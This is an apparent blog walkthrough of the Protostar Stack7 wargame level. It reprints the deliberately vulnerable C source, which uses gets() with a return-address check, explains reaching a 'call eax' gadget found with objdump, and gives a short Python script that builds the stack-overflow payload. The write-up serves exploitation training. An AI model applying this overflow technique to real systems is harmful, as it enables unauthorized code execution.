Binary Exploitation Protostar Stack7 - Walkthrough - Writeup

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack7 Level.

In this level, Our goal is to overwrite Return pointer Address And Then Use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just have to prove that with this vulnerability we can exploit this software. but here comes a difficulty of this level. As Already mentioned in the hint

Stack7 looks at what happens when you have restrictions on the return address. So, In simple words, we have to exploit this level in another way.

After Searching About Different Concepts And Techniques. I found a simple technique that can bypass this level restrictions easily.

and I will also suggest you, spend few minutes in reading about these techniques.

1. Call Instruction In Assembly
2. ROP Technique


And Try To Apply all these techniques at this level.
By The way, I am going to test it all. So, Check My Blog Index for These Techniques Implementations.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here. hahaha! I'm not going to tell all steps clearly. Just Reference. (Use Your Own Brain And Google)
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}


Hint

Stack6 introduces return to .text to gain code execution.

The metasploit tool “msfelfscan” can make searching for suitable instructions very easy, otherwise looking through objdump output will suffice.

This level is at /opt/protostar/bin/stack7


Concept

Well, It's very unique case. here, as we know that we can't overwrite return address starting from 0xb....... hex values.
So, what we will do is, we will find a special and suitable instruction from the source that can help us to exploit this level. Basically, at this level, we are going to use Call EAX  Instruction. In Simple Words, We just going to points our EIP to Call EAX instruction in Source Code.

For Example:
          At the end of the getpath function, To execute the strdup operation. our system will copy all codes into eax registers to Pass arguments. So, we just need to find a call eax instruction from source code and then point our eip to that source code.


Simple!


To Find Instruction Use:

objdump -S stack7 | grep "call"

Implementation

0         42        46          76         80     84
===================================================
|  'a'*42 | '\xcc'*4 | '\x90'*30 | '\xcc'*4 | EIP |
===================================================


Exploit

#!/usr/bin/python
import struct


tbuf = 76
buf = "\x41"*42+'\xcc'*4+'\x90'*30

ebp = "\xcc"*4



eip = struct.pack("I",0x80485eb)

payload = buf+ ebp + eip + '\xcc'*4


print payload


For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »